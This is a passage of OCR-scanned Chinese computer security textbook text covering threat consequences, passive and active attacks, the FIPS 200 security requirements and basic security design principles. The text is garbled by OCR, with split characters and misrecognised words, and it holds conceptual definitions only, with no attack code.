DAB: 非 授权 实体 通过 躲避 系统 安全 保护 措施 来 获得 对 敏感 数据 的 访问 
欺骗 冒充 ; 非 授权 实体 通过 伴 装 成 授权 实体 来 访问 系统 或 执行 恶意 行为 
导致 授 权 实体 接受 虚假 数据 并 相 | 伪造 : 以 虚假 数据 欺骗 授权 实体 
信 其 正确 性 的 情况 或 事件 抵赖 : 一 个 实体 通过 虚伪 地 否认 对 行为 的 责任 而 欺骗 另 一 个 实体 
破坏 失 能 : 通过 禁用 系统 组 件 来 阻止 或 中 断 系统 运行 
中 断 或 阻止 系统 服务 和 功能 正确 | 损坏 : 通过 对 系统 功能 或 数据 的 不 利 修改 来 对 系统 运行 进行 非 期 望 的 改变 
运行 的 情况 或 事件 阻碍 : 通过 阻止 系统 运行 来 中 断 系统 服务 交付 的 威胁 活动 
算 夺 l 
盗用 : 实体 对 系统 资源 采取 非 授权 的 逻辑 或 物理 控制 
导致 系统 服务 或 功能 被 非 授权 实 ~ ihe ad 
Preise rors 误 用 : 导致 系统 组 件 执行 对 系统 安全 有 害 的 功能 或 服务 


非 授 权 泄 露 (unauthorized disclosure) 是 对 机 密 性 的 威胁 。 下 面 的 攻击 类 型 会 导致 这 样 的 
威胁 后 果 。 
o 暴露 (exposure): 这 可 能 是 故意 的 ， 如 内 部 用 户 蓄意 泄露 敏感 信息 (如 信用 卡 卡 
号 ) 给 外 部 。 也 可 能 是 由 于 个 人 、 硬 件 或 软件 的 错误 而 导致 其 他 实体 获得 非 授 权 的 
敏感 数据 。 有 很 多 这 种 情况 的 实例 ， 如 一 些 大 学 不 经 意 地 将 学 生 的 机 密 信息 公布 在 
9 | 网 上 。 
© 截获 (interception): 在 通信 环境 中 ， 拦 截 是 最 普遍 的 一 种 攻击 方式 。 在 共享 式 局 域 网 
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(LAN) 如 无 线 LAN 或 广播 以 太 网 中 ， 任 何 连 接 到 LAN 的 设备 都 能 接收 到 期 望 发 送 给 
其 他 设备 的 数据 包 的 副本 。 在 Intenet 上 ， 有 目的 的 黑客 能 够 访问 电子 邮件 通信 流量 和 
其 他 数据 传输 情况 。 所 有 这 些 情况 都 为 非 授 权 访 问 数据 创造 了 可 能 。 

o 推理 (inference): 通信 量 分 析 是 大 家 熟知 的 推断 的 例子 ， 敌 手 通过 观察 网 络 的 通 
信 流 量 模式 得 到 信息 ， 例 如 网 络 中 特定 主机 间 的 通信 流量 。 另 一 个 例子 是 ， 具 有 某 
数据 库 受 限 访问 权 的 用 户 可 以 推理 出 细节 信息 ， 这 是 通过 组 合 重 复查 询 的 结果 而 实 


。 A (intrusion): 入 侵 的 例子 是 敌手 通过 攻克 系统 的 访问 控制 保护 ， 得 到 对 敏感 数据 
的 非 授 权 访 问 。 


欺骗 (deception) 是 对 系统 完整 性 或 数据 完整 性 的 威胁 。 下 面 的 攻击 类 型 会 导致 这 样 的 威 
HJER: 

e BE (masquerade): 冒充 的 一 个 例子 是 非 授 权 用 户 通过 伴 装 成 授权 用 户 访 问 系统 ; 如 
果 非 授权 用 户 知道 其 他 用 户 的 注册 ID 和 口令 的 话 ， 这 种 情况 是 很 容易 发 生 的 。 男 一 个 
例子 是 恶意 代码 程序 ， 如 特洛伊 木马 ， 看 上 去 是 在 执行 有 用 或 预期 的 功能 ， 实 际 上 获 
得 了 系统 资源 的 非 授 权 访 问 或 者 欺骗 用 户 执 行 其 他 恶意 逻辑 。 

e 伪造 ( falsification): 指 更 改 或 替换 有 效 数 据 或 将 虚假 数据 引入 文件 或 数据 库 。 例 如 ， 
学 生 可 能 在 学 校 数 据 库 中 更 改 其 成 绩 。 

e 抵赖 (repudiation): 在 这 种 情况 下 ， 用 户 否 认 发 送 数据 ， 或 者 用 户 否 认 接 收 或 拥有 
数据 。 

破坏 (disruption) 是 对 系统 可 用 性 或 完整 性 的 威胁 。 下 面 的 攻击 类 型 会 导致 这 样 的 威胁 

后 果 : 

e 失 能 (incapacitation): 是 对 系统 可 用 性 的 攻击 ， 会 导致 物理 破坏 或 系统 硬件 的 损害 。 
更 具 代 表 性 的 恶意 软件 ， 例 如 特洛伊 木马 、 病 毒 或 蠕虫 ， 能 够 通过 这 种 方式 使 得 系统 
功能 丧失 或 它 的 部 分 服务 不 可 用 。 

e 损坏 (corruption): 是 对 系统 完整 性 的 攻击 。 这 个 语 境 中 的 恶意 软件 可 能 使 得 系统 资源 或 
服务 以 不 期 望 的 方式 工作 。 或 者 用 户 通 过 非 授 权 方 式 访问 系统 ， 修 改 它 的 某 些 功能 。 后 
者 的 一 个 例子 是 用 户 在 系统 中 设置 后 门 逻 辑 ， 使 得 其 后 能 以 非 正 常 程 序 访 问 系统 及 其 
资源 。 

e 阻碍 (obstruction): 阻碍 系统 运行 的 一 种 方式 是 通过 中 断 通信 和 链 路 或 者 更 改 通 信 控 制 
信息 来 干扰 通信 。 另 一 种 方式 是 通过 对 通信 流量 或 处 理 需 资源 施加 额外 的 负担 使 系统 
过 载 。 

Az (usurpation) 是 对 系统 完整 性 的 威胁 。 下 面 的 攻击 类 型 会 导致 这 样 的 威胁 后 果 : 

© 盗用 (misappropriation): 包括 服务 窃取 。 一 个 例子 是 分 布 式 拒绝 服务 攻击 ， 恶 意 软 件 
被 安装 在 很 多 主机 上 ， 这 些 主机 将 作为 向 目标 主机 发 送 通信 流量 的 平台 。 在 这 种 情况 
下 ， 亚 意 软 件 将 非 授权 使 用 处 理 器 和 操作 系统 资源 。 

e 误 用 (misuse): 误 用 经 常 由 恶意 代码 引起 ， 或 者 由 获得 对 系统 非 授 权 访 问 的 黑客 造成 。 
这 两 种 情况 下 ， 安 全 功能 被 禁用 或 被 阻碍 。 


1.2.2 威胁 与 资产 


计算 机 系统 资产 可 以 分 为 硬件 、 软 件 、 数 据 以 及 通信 线路 和 网 络 。 在 本 小 节 中 ， 我 们 
简单 描述 这 四 个 类 别 ， 并 将 它们 与 1.1 节 介 绍 的 完整 性 、 机 密 性 和 可 用 性 的 概念 联系 起 来 
( 见 图 1-3 和 表 1-3 )。 
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图 1-3 计算 机 安全 的 范围 
Zz: 本 图 描述 了 物理 安全 之 外 的 安全 问题 ， 包 括 控制 对 计算 机 系统 的 访问 ， 保 护 通信 系统 上 传输 的 教 据 及 存储 
的 数据 。 
表 1-3 计算 机 和 网 络 资产 的 威胁 举例 


设备 被 偷盗 或 禁用 ， 因 而 拒绝 s i m : 
硬件 提供 服务 未 加 密 的 USB 设备 被 盗 
正在 运行 的 程序 被 修改 ， 
软件 程序 被 删除 ， 拒 绝 用 户 访问 软件 的 非 授 权 拷 贝 使 其 在 执行 过 程 中 失败 或 执 
行 一 些 非 预期 的 任务 


非 授 权 读 取 数据 。 分 析 统 
计数 据 来 揭露 潜在 的 深层 次 | ”修改 已 有 文件 或 伪造 新 文件 
的 数据 

消息 被 读 取 。 消 县 的 流量 | TERE, WR, E 
模式 被 观察 到 排序 或 复制 。 伪 造 虚假 消息 
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数据 文件 被 删除 ， 拒 绝 用 户 访问 






消息 被 破坏 或 删除 。 通 信 线 路 





ERE | 或 网 络 不 可 用 

硬件 ”对 计算 机 系统 硬件 的 主要 威胁 是 对 其 可 用 性 的 威胁 。 人 硬件 最 容易 受到 攻击 ,但 其 对 
自动 化 控制 最 不 敏感 。 威 胁 包括 意外 或 蓄意 地 对 设备 进行 破坏 和 偷盗 。 个 人 计算 机 和 工作 站 的 
盛行 及 计算 机 网 络 的 广泛 使 用 增加 了 该 领域 出 现 损失 的 可 能 性 。 从 次 USB 设备 导致 机 密 性 受 
损 。 需 要 采用 物理 或 管理 方面 的 安全 措施 来 处 理 这 些 威胁 。 

软件 ”软件 包括 操作 系统 、 实 用 程序 和 应 用 程序 。 对 于 软件 的 主要 威胁 是 对 软件 可 用 性 的 
攻击 。 软 件 ， 尤 其 是 应 用 软件 通常 很 容易 被 删除 。 软 件 也 可 能 被 修改 或 被 破坏 而 不 能 使 用 。 说 
慎 的 软件 配置 管理 ， 包 括 对 软件 最 新 版 本 的 备份 ， 能 够 保持 其 高 可 用 性 。 更 难处 理 的 问题 是 对 
软件 进行 修改 ， 使 其 虽 仍 能 运行 ， 但 与 以 前 的 行为 大 不 相同 ， 这 是 对 软件 完整 性 / 真实 性 的 威 
胁 。 计 算 机 病毒 及 相关 攻击 就 归属 这 一 类 。 最 后 一 个 问题 是 保护 软件 不 被 盗版 。 尽 管 采 取 了 某 
些 对 策 ， 但 总 的 来 说 软件 的 非 授 权 拷贝 问题 还 没有 根本 解决 

数据 ”硬件 和 软件 安全 通常 由 计算 中 心 的 专家 关注 或 者 由 个 别 PC 用 户 关 注 。 更 加 普遍 的 
问题 是 数据 安全 ， 其 涉及 由 个 人 、 团 体 或 商业 组 织 控制 的 文件 或 其 他 形式 的 数据 。 


关于 数据 方面 的 安全 问题 是 广泛 的 ， 包 含 可 用 性 、 机 密 性 和 完整 性 。 就 可 用 性 而 言 ， 我 们 
关心 的 是 被 偶然 或 恶意 破坏 的 数据 文件 。 

对 于 保密 性 的 主要 威胁 是 非 授 权 读 取 数 据 文件 或 数据 库 。 与 计算 机 安全 的 其 他 领域 相 比 ， 
这 个 领域 我 们 需要 进行 更 多 的 研究 和 付出 更 多 的 努力 。 一 种 对 保密 不 太 明 显 的 威胁 是 ， 进 行 数 
据 分 析 并 在 使 用 提供 概括 和 聚集 信息 的 所 谓 统计 数据 库 的 过 程 中 表现 出 来 的 。 假 定 已 有 的 聚集 
言 息 不 会 威胁 有 关 个 人 的 隐私 。 然 而 随 着 统计 数据 库 使 用 次 数 的 增加 ， 个 人 信息 泄露 的 可 能 性 
也 会 增加 。 事 实 上 ， 组 成 个 体 的 特征 可 以 通过 细致 的 分 析 识 别 出 来 。 例 如 ， 如 果 一 张 表 记录 着 
被 访 者 A、B、C 和 DD 收入 的 合计 ， 而 另 一 张 表 记录 着 被 访 者 A、B、C、D 和 了 收入 的 合计 ， 
那么 两 个 合计 的 差 值 将 是 E 的 收入 。 如 果 进 一 步 要 求 合 并 数据 集 ， 这 个 隐私 信息 泄露 问题 还 
会 加 剧 。 许 多 情况 下 ， 为 了 保持 不 同 聚 集 级 别 的 一 致 性 而 匹配 几 个 数据 集 时 ， 需 要 访问 个 体 单 
元 。 因 而 ， 个 体 单 元 作为 隐私 问题 的 主体 ， 在 数据 集 处 理 的 不 同 阶段 都 可 以 获得 。 

最 后 ， 数 据 完 整 性 在 大 多 数 安装 过 程 中 都 是 我 们 主要 关心 的 问题 。 对 数据 文件 的 修改 产生 
的 后 果 可 能 很 小 也 可 能 很 严重 。 

通信 线路 和 网 络 ”网 络 安全 攻击 可 以 划分 为 被 动 攻 击 和 主动 攻击 。 被 动 攻 击 企图 了 解 或 利 
用 系统 信息 ， 但 不 影响 系统 资源 。 主 动 攻击 则 试图 改变 系统 的 资源 或 者 影响 其 运行 。 

被 动 攻 击 (passive attack) 的 本 质 是 窃听 或 监视 数据 传输 。 攻 击 者 的 目标 是 获取 传输 的 数 
据 信 息 。 被 动 攻击 的 两 种 形式 是 消息 内 容 泄 露 和 流量 分 析 。 

e 消息 内 容 泄露 (release of message content) 很 容易 理解 。 电 话 通 话 、 电 子 邮 件 消息 和 传 

输 的 文件 中 都 有 可 能 包含 敏感 或 机 密 信 息 。 我 们 希望 阻止 对 手 了 解 传输 的 内 容 。 

e 另 一 种 被 动 攻 击 即 流量 分 析 (traffic analysis) 更 加 巧妙 。 假 设 我 们 有 一 种 方法 可 以 隐藏 
消息 内 容 或 其 他 信息 流量 ， 使 得 攻击 者 即使 捕获 了 该 消息 也 不 能 从 消息 中 提取 出 信息 。 
通常 用 来 隐藏 内 容 的 技巧 是 加 密 。 即 使 我 们 恰当 地 进行 了 加 密 保 护 ， 对 手 仍 可 能 获得 
这 些 消息 的 模式 。 对 手 可 以 确定 出 通信 主机 的 位 置 和 身份 ， 并 能 观察 到 正 被 交换 的 消 
息 的 频率 和 长 度 。 这 些 信息 对 于 判断 已 发 生 的 通信 的 性 质 很 有 帮助 。 

被 动 攻击 由 于 不 涉及 对 数据 的 修改 ， 所 以 很 难 察觉 。 通 常 ， 消 息 流量 表面 上 以 正常 的 方式 
发 送 和 接收 ， 收 发 双方 都 不 知道 有 第 三 方 已 经 读 取 该 消息 或 者 观察 了 流量 模式 。 尽 管 如 此 ， 阻 
止 这 些 攻 击 还 是 切实 可 行 的 ， 通 常 使 用 加 密 的 方法 来 实现 。 因 此 ， 对 付 被 动 攻 击 的 重点 是 阻止 
而 不 是 检测 。 

主动 攻击 (active attack) 包含 对 数据 流 进行 自 改 或 伪造 数据 流 ， 其 可 以 划分 为 四 类 : 重 放 、 
冒充 、 算 改 消息 和 拒绝 服务 。 

o 重 放 (replay) 涉及 被 动 获取 数据 单元 并 在 稍 后 重 传 ， 以 产生 非 授权 的 效果 。 

e 冒充 ( masquerade) 发 生 在 一 个 实体 假装 成 另 一 个 不 同 实体 的 场合 。 骨 充 攻击 通常 包含 

其 他 主动 攻击 形式 中 的 一 种 。 例 如 ， 捕 获 认 证 序列 ， 并 在 有 效 的 认证 序列 之 后 重 放 ， 
这 样 就 可 以 使 具有 很 少 特 权 的 授权 实体 通过 冒充 具有 更 多 特权 的 实体 而 获得 这 些 额 外 
的 特权 。 

e 算 改 消息 (modification of message) 简单 来 说 是 指 合 法 消息 的 某 些 部 分 被 算 改 ,或 者 消 
息 被 延迟 或 被 重新 排序 ， 从 而 产生 非 授权 效果 。 例 如 ， 将 内 容 为 “允许 John Smith 读 
取 机 密 文 件 accounts ”的 消息 算 改 为 “允许 Fred Brown 读 取 机 密 文 件 accounts”。 
拒绝 服务 ( denial of service) 可 以 阻 目 或 禁止 对 通信 设施 的 正常 使 用 或 管理 。 这 种 攻击 
可 能 有 具体 的 目标 。 比 如 ， 一 个 实体 可 能 禁止 所 有 发 回 某 个 目的 地 (如 安全 审计 服务 ) 
的 消息 。 另 一 种 形式 的 拒绝 服务 是 破坏 整个 网 络 ， 使 网 络 失 效 或 用 信息 使 其 过 载 从 而 
降低 其 性 能 。 


主动 攻击 表现 出 与 被 动 攻击 相反 的 特征 。 被 动 攻击 虽然 难以 检测 ， 但 却 有 办 法 防范 。 而 主 
动 攻击 却 很 难 绝对 地 进行 防范 ， 因 为 要 实现 这 个 目的 就 要 对 所 有 通信 设施 和 路 径 进 行 不 同 断 的 
物理 保护 。 所 以 重点 在 于 检测 主动 攻击 并 从 其 导致 的 破坏 或 延迟 中 恢复 过 来 。 由 于 检测 本 身 具 
有 威慑 作用 ， 所 以 它 也 可 以 对 防范 起 到 一 定 作用 。 


13 ”安全 功能 要 求 


有 很 多 种 方法 可 以 用 来 对 减少 脆弱 性 并 处 理 系 统 资产 威胁 的 对 策 进 行 分 类 和 摘 述 。 本 区 我 
们 从 功能 要 求 角度 分 析 对 策 ， 遵 循 FIPS 200 (联邦 信息 和 信息 系统 最 低 安全 要 求 ) 定义 的 分 类 
方法 。 该 标准 列举 了 17 个 安全 相关 的 领域 ， 涉 及 保护 信息 系统 及 其 处 理 、 存 储 和 传输 的 信息 
的 机 蜜 性、 完整 性 和 可 用 性 。 这 些 领域 定义 在 表 1-4 中 。 


表 1-4 安全 要 求 ( 源 自 FIPS 200) 


访问 控制 (access control): 限制 信息 系统 只 能 由 授权 用 户 或 以 授权 用 户 名 义 执行 的 进程 或 设备 (包括 其 他 信息 系统 ) 
访问 ， 限 制 授权 用 户 被 允许 执行 的 事务 和 功能 的 类 型 。 

意识 和 培训 ( awareness and training): (i) 确保 信息 系统 的 管理 者 和 用 户 能 够 意识 到 与 他 们 的 活动 相关 的 安全 风 
险 ， 以 及 与 信息 系统 安全 相关 的 法 律 、 法 规 和 政策 ; (ii) 确保 个 人 通过 充分 的 培训 能 够 承担 与 信息 安全 相关 的 任务 
和 职责 。 

审计 和 可 说 明 性 (audit and accountability): (i) 最 大 限度 地 创建 、 保 护 和 保留 信息 系统 审计 记录 ， 用 于 监视 、 分 析 、 
调查 和 报告 不 合法 的 、 非 授权 的 或 不 正当 的 信息 系统 活动 ; Gi) 确保 个 别 信息 系统 用 户 的 活动 能 被 唯一 追踪 ， 以 便 他 
们 对 自己 的 行为 负责 。 

认证 纺 、 信 和 赖 和 安全 评估 (certification, accreditation and security assessment) : (i) 定期 评估 机 构 的 信息 系统 的 安全 
控制 措施 ， 确 定 该 控制 措施 在 其 应 用 中 是 否 有 效 ; Gi) 开发 并 实施 用 来 纠正 机 构 信息 系统 的 不 足 、 减 少 或 消除 其 脆弱 
性 的 行动 计划 ; (iii) 对 机 构 信 息 系统 及 相关 的 信息 系统 连接 的 运行 授权 ; (iv) 实时 监视 信息 系统 的 安全 控制 措施 ， 
确保 控制 措施 的 持续 有 效 性 。 

配置 管理 ( configuration management) : (i) 建立 和 维护 贯穿 于 各 个 机 构 信息 系统 开发 的 生命 周期 中 的 基线 配置 和 清 
单 (包括 硬件 、 软 件 、 固 件 和 文档 ); Gi) 建立 和 执行 在 机 构 信 息 系 统 中 部 署 的 信息 技术 产品 的 安全 配置 。 

应 急 规 划 (contingency planning): 建立 、 维 护 和 实施 针对 机 构 信 息 系统 的 应 急 啊 应 、 备 份 操作 和 灾后 恢复 的 计划 , 
确保 在 紧急 情况 下 关键 信息 资源 的 可 用 性 和 操作 的 持续 性 。 

识别 与 认证 (identification and authentication): 标识 信息 系统 用 户 、 以 用 户 名 义 进 行 的 进程 或 设备 ， 认 证 (或 验证 ) 
这 些 用 户 、 进 程 或 设备 的 身份 ， 以 此 作为 允许 访问 机 构 信息 系统 的 先决 条 件 。 

事故 响应 (incident response): 建立 对 机 构 信 息 系统 的 运行 事故 处 理 能 力 ， 包 括 充 分 的 准备 、 检 测 oT. all 
恢复 和 用 户 响应 活动 ; Gi) 跟踪 、 记 载 并 将 事故 报告 给 适当 的 组 织 官员 及 管理 机 构 。 

维护 (maintenance): (i) 对 机 构 信息 系统 进行 定期 、 及 时 的 维护 ; (ii) 对 实施 信息 系统 维护 所 用 到 的 工具 、 技 术 、 
机 制 和 人 员 提 供 有 效 的 控制 。 

介质 保护 (media protection): (i) 保护 信息 系统 纸 制 和 数字 的 介质 ; Gi) 限制 授权 用 户 访问 信息 系统 介质 上 的 信息 ; 
(iii) 在 销毁 或 者 放弃 再 次 使 用 之 前 ， 消 除 或 破坏 信息 系统 介质 。 

物理 和 环境 保护 (physical and environmental protection) : (i) 限制 授权 个 体 对 信息 系统 、 设 备 和 各 自 操作 环境 的 物 
理 访问 ; (ii) 保护 信息 系统 的 物理 厂房 和 支持 基础 设施 ; Gii) 提供 对 信息 系统 的 支持 设施 ; Civ) 保护 信息 系统 免 受 环 
境 危 害 ; (v) 对 包含 信息 系统 的 场所 提供 适当 的 环境 控制 措施 。 

规划 (planning): 开发 、 文 档 记 录 、 定 期 更 新 和 实施 机 构 信 息 系 统 的 安全 计划 ， 其 中 描述 了 信息 系统 中 适当 的 或 规 
划 中 的 安全 控制 措施 以 及 个 人 访问 信息 系统 的 行为 规则 。 

人 员 安 全 (personnel security): (i) 确保 机 构 (包括 第 三 方 服务 提供 者 ) 中 处 于 责任 岗位 的 个 人 是 可 信赖 的 并 
满足 已 建立 的 该 岗位 的 安全 准则 ; (ii) 保证 在 职工 离职 和 调动 等 人 事 活 动 前 后 ， 机 构 信 息 和 信息 系统 是 受 保护 
的 ; (iii) 对 职工 不 能 遵守 机 构 的 安全 策略 和 程序 的 ， 制 定 正式 的 制裁 方法 。 

风险 评估 (risk assessment): 定期 评估 机 构 运行 (包括 任务 、 职 能 、 形 象 或 声誉 )、 机 构 资 产 和 个 体 的 风险 ， 这 根据 
机 构 信息 系统 的 运行 及 相关 的 机 构 信 息 的 处 理 、 存 储 或 传输 得 出 。 


O 根据 习惯 ， 本 书 中 的 authentication 和 certification 均 译 为 “认证 ”。authentication 也 可 译 为 鉴别 ， 指 确保 实 
体 是 它 所 声称 的 实体 ， 如 身份 认证 ; certification 指 可 交付 件 是 否 符合 规定 需求 所 给 出 的 正式 保证 陈述 的 规 
程 ， 如 产品 认证 ， 在 第 1 章 和 第 27 章 中 出 现 。 请 读者 根据 上 下 文 加 以 区 分 。 一 -一 译 者 注 
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( 续 ) 


系统 和 服务 获取 (system and service acquisition): (i) 分 配 足 够 的 资源 来 充分 保护 机 构 信 息 系 统 ; Gi) 在 系统 开发 生 


命 周期 中 考虑 信息 安全 问题 ; (iii) 使 用 软件 用 法 和 安装 限制 ; (iv) 确保 第 三 方 提供 充分 的 安全 措施 来 保护 机 构 外 包 
的 信息 、 应 用 或 服务 。 

系统 和 通信 保护 (system and communication protection): (i) 在 信息 系统 的 外 边界 和 关键 内 边界 上 监视 、 控 制 和 保 
护 机 构 通 信 ( 即 机 构 信 息 系 统 的 信息 传输 或 接收 ); (ii) 利用 架构 设计 、 软 件 开发 技术 和 系统 工程 原理 来 提高 机 构 信 
息 系统 的 信息 安全 的 有 效 性 。 

系统 和 信息 完整 性 (system and information integrity): (i) 及 时 地 识别 、 报 告 和 纠正 信息 和 信息 系统 的 缺陷 ;(ii) 在 


机 构 信 息 系统 的 适当 位 置 提供 恶意 代码 防护 ; Gii) 监视 信息 系统 安全 报警 和 警告， 并 采取 适当 的 行动 作为 啊 应 。 


列举 在 FIPS 200 中 的 要 求 ， 包 含 了 针对 安全 脆弱 性 和 威胁 的 多 种 对 策 。 我 们 可 以 粗略 
地 将 这 些 对 策 分 成 两 类 : 一 类 要 求 计算 机 安全 技术 措施 (本 书 的 第 一 部 分 和 第 二 部 分 会 涉 
及 )， 要 么 仅 包 含 硬件 或 软件 ， 要 么 二 者 都 包含 ; 男 一 类 基本 上 是 管理 问题 (本 书 的 第 三 部 分 
会 涉及 )。 

每 一 个 功能 领域 可 能 都 会 涉及 计算 机 安全 技术 措施 和 管理 措施 。 主 要 要 求 计算 机 安全 技术 措 
施 的 功能 领域 ， 包括 访问 控制 、 识 别 与 认证 、 系 统 和 通信 保护 、 系 统 和 信息 完整 性 。 主 要 涉及 管 
理 控制 措施 和 程序 的 功能 领域 ,包括 意识 和 培训 ， 审 计 和 可 说 明 性 ， 认 证 、 信 赖 和 安全 评估 ， 
应 急 规划 ， 维 护 ， 物 理 和 环境 保护 ， 规 划 ， 人 员 安 全 ， 风 险 评估 ， 系 统 和 服务 获取 。 同 时 包含 在 
计算 机 安全 技术 措施 和 管理 控制 措施 中 的 功能 领域 ,包括 配置 管理 、 事 故 响 应 和 介质 保护 。 

值得 注意 的 是 ，FIPS 200 中 的 大 多 数 功 能 要 求 领域 主要 是 管理 问题 或 者 至 少 有 重要 的 管理 
组 件 ， 这 与 纯 软 件 或 硬件 解决 方案 是 相对 的 。 一 些 读者 可 能 会 对 此 觉得 很 新 鲜 ， 但 其 却 没有 在 
许多 计算 机 和 信息 安全 的 书籍 中 体现 出 来 。 正 如 一 个 计算 机 安全 专家 所 言 ,“ 如 果 你 认为 技术 
可 以 解决 安全 问题 ， 那 么 你 并 不 理解 安全 问题 ， 也 并 不 理解 技术 ”[SCHN00]。 本 书 指出 有 必 
要 将 技术 和 管理 方法 结合 起 来 以 取得 有 效 的 计算 机 安全 。 

FIPS 200 提供 了 技术 和 管理 方面 的 主要 相关 领域 的 非常 有 用 的 概述 ， 这 些 都 与 计算 机 安全 
相关 。 本 书 努 力 涵盖 所 有 这 些 领域 。 


1.4 基本 安全 设计 原则 


尽管 经 历 了 多 年 的 研究 和 发 展 ， 系 统 地 排除 安全 漏洞、 防止 未 经 授权 的 所 有 操作 的 安全 设 
计 和 实现 技术 还 没有 开发 出 来 。 由 于 缺少 完备 的 技术 ， 因 此 制定 一 系列 被 广泛 认可 的 设计 原则 
以 指导 保护 机 制 的 开发 是 非常 必要 的 。 美 国 国家 安全 局 (NSA) 和 美国 国土 安全 部 (DHS) 联 
合 创建 的 信息 保障 /网 络 防 御 国家 早 越 学 术 中 心 (The National Centers of Academic Excellence 
in Information Assurance/Cyber Defense) 列 出 了 以 下 基本 安全 设计 原则 
e 经 济 机 制 (economy of mechanism) 原则 
安全 缺 省 设置 (fail-safe default) 原则 
绝对 中 介 (complete mediation) 原则 
开放 式 设 计 (open design) 原则 
特权 分 离 (separation of privilege) 原则 
最 小 特权 (least privilege) 原则 
最 小 共用 机 制 (least common mechanism) 原则 
心理 可 接受 性 (psychological acceptability) 原则 
隔离 (isolation) 原则 
封装 (encapsulation) 原则 
模块 化 (modularity) 原则 
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e 分 层 (layering) 原则 

e 最 小 惊动 (least astonishment) 原则 

前 八 项 原则 最 早 被 列 人 文献 [SALT75]， 并 经 历 了 时 间 的 考验 。 本 节 中 ,我 们 将 简要 地 讨 
论 上 述 每 一 个 原则 。 

经 济 机 制 原则 ， 指 能 人 在 硬件 和 软件 中 的 安全 机 制 的 设计 要 尽 可 能 简单 、 短 小 。 这 是 因 
为 ， 简 单 、 短 小 的 设计 更 易于 进行 彻底 的 测试 和 验证 。 复 杂 的 设计 则 为 敌手 发 现 和 利用 微小 的 
缺陷 提供 了 更 多 的 机 会 ， 并 且 很 难 被 事先 发 现 。 设 计 机 制 越 复 杂 ， 包 含 可 利用 缺陷 的 可 能 性 越 
大 。 而 在 简单 的 机 制 中 则 很 难 发 现 可 利用 的 缺陷 ， 并 且 需 要 更 少 的 维护 。 此 外 ， 由 于 配置 管理 
问题 的 简化 ， 因 此 更 新 或 替代 一 个 简单 机 制 也 不 会 太 烦 琐 。 在 实践 中 ， 这 可 能 是 最 难 遵守 的 原 
则 。 在 复杂 的 安全 设计 任务 中 ， 对 硬件 和 软件 新 特性 都 会 有 持续 的 要 求 。 所 以 在 进行 系统 设计 
的 时 候 应 当 考 虑 此 原则 ， 尽 量 降低 不 必要 的 复杂 性 。 

安全 缺 省 设置 原则 ， 指 访问 控制 应 当 基 于 许可 而 不 是 排除 。 也 就 是 说 ， 缺 省 的 情形 是 不 能 
进行 访问 的 ， 而 保护 方案 可 以 识别 在 什么 情况 下 访问 是 被 允许 的 。 当 缺 省 的 选择 基于 许可 时 ， 
这 种 方式 比 另 一 种 方式 能 更 好 地 识别 故障 。 如 果 一 个 机 制 中 的 设计 或 实现 出 现 了 故障 ， 则 在 安 
全 环境 下 (基于 许可 )， 很 快 就 能 发 现 这 一 问题 ， 因 为 在 该 模式 下 会 被 拒绝 访问 。 相 反 ， 如 果 
故障 出 现在 以 排除 作为 访问 控制 的 环境 下 ， 这 个 故障 可 能 会 持续 很 久 都 不 会 被 发 现 ， 因 为 默认 
是 允许 访问 的 。 举 例 来 说 ， 大 多 数 文 件 存 取 系 统 都 基于 这 一 原则 ， 实 际 上 在 客户 端 /服务 器 系 
统 中 ， 所 有 被 保护 的 服务 也 都 是 基于 这 一 原则 。 

绝对 中 介 原 则 ， 指 每 一 次 访问 都 应 当 依 据 访 问 控制 机 制 进行 检查 。 系 统 不 应 该 依赖 于 从 
缓存 中 检索 到 的 访问 命令 。 在 设计 持续 运行 的 系统 时 ， 这 一 原则 要 求 : 如 果 访 问 命令 被 提示 
是 将 来 使 用 ， 那 么 如 何 改变 优先 级 顺序 的 详细 说 明 被 传递 给 本 地 存储 占 。 文 件 访问 系统 则 是 
遵守 这 一 原则 的 例子 。 然 而 ,通常 情况 下 ， 一旦 用 户 打 开 了 一 个 文件 ， 对 是 否 有 权限 的 改变 
就 不 会 进行 检查 。 为 彻底 实现 绝对 中 介 ， 用 户 每 次 读 取 文件 的 一 个 域 或 记录 ， 或 者 数据 库 中 
的 一 个 数据 项 时 ， 系 统 都 必须 进行 访问 控制 。 这 一 资源 密集 ( 即 占用 大 量 资 源 ) 的 方法 很 少 
被 使 用 。 

开放 式 设计 原则 ， 指 安全 机 制 的 设计 应 当 开放 而 非 保 密 。 例 如 ,虽然 加 密 密 钥 是 保密 的 ， 
但 加 密 算法 则 应 彻底 地 对 外 公开 。 这 样 算法 就 能 被 许多 专家 审查 ， 因 此 用 户 就 能 对 其 更 加 信 
任 。 这 是 NIST (National Institute of Standards and Technology， 美 国 国 家 标准 与 技术 研究 所 ) 所 
遵从 的 ， 标 准 化 的 加 密 和 散 列 算法 程序 已 使 NIST 认证 算法 被 广泛 认可 。 

特权 分 离 原则 ， 在 文献 [SALT75] 中 ， 特 权 分 离 原则 是 为 对 于 限定 资源 的 访问 需要 多 特权 
属性 的 情况 定义 的 。 多 因素 用 户 认证 就 是 一 个 很 好 的 例子 ， 它 需要 用 多 种 技术 ， 比 如 同时 拥有 
密码 和 智能 卡 ， 才 能 对 用 户 授 权 。 这 一 原则 也 应 用 于 任何 一 项 技术 ， 只 要 程序 能 被 分 成 多 个 部 
分 ， 而 每 个 部 分 受 限 于 各 个 部 分 的 特定 权限 而 执行 一 个 特定 的 任务 。 特 权 分 离 可 以 减轻 计算 机 
安全 攻击 可 能 造成 的 破坏 。 这 可 以 通过 下 面 的 例子 说 明 : 将 一 个 进程 的 高 特权 操作 转移 给 男 一 
个 进程 并 运行 这 个 进程 去 完成 具有 更 高 特权 要 求 的 任务 。 日 党 我 们 所 见 到 的 各 种 界面 都 通过 更 
低 权 限 的 进程 执行 。 

最 小 特权 原则 ， 是 指 每 个 进程 和 系统 用 户 都 应 当 使 用 完成 某 项 任务 必需 的 最 少 特权 集 进 行 
操作 。 很 好 地 利用 这 一 原则 的 例子 就 是 基于 角色 的 访问 控制 ， 第 4 章 将 对 此 详细 阐述 。 系 统 安 
全 策略 可 以 识别 或 定义 不 同 的 进程 或 用 户 角 色 。 每 一 个 角色 被 分 配 仅 完成 其 功能 所 必需 的 许可 
权 。 每 个 许可 都 指定 了 一 个 对 特定 资源 的 访问 权 (例如 ， 读 写 访问 一 个 特定 的 文件 或 目录 ， 又 
如 连接 访问 给 定 的 主机 或 端口 等 )。 除 非 明 确 地 授予 了 权限 ， 否 则 用 户 或 进程 都 不 能 访问 受 保 
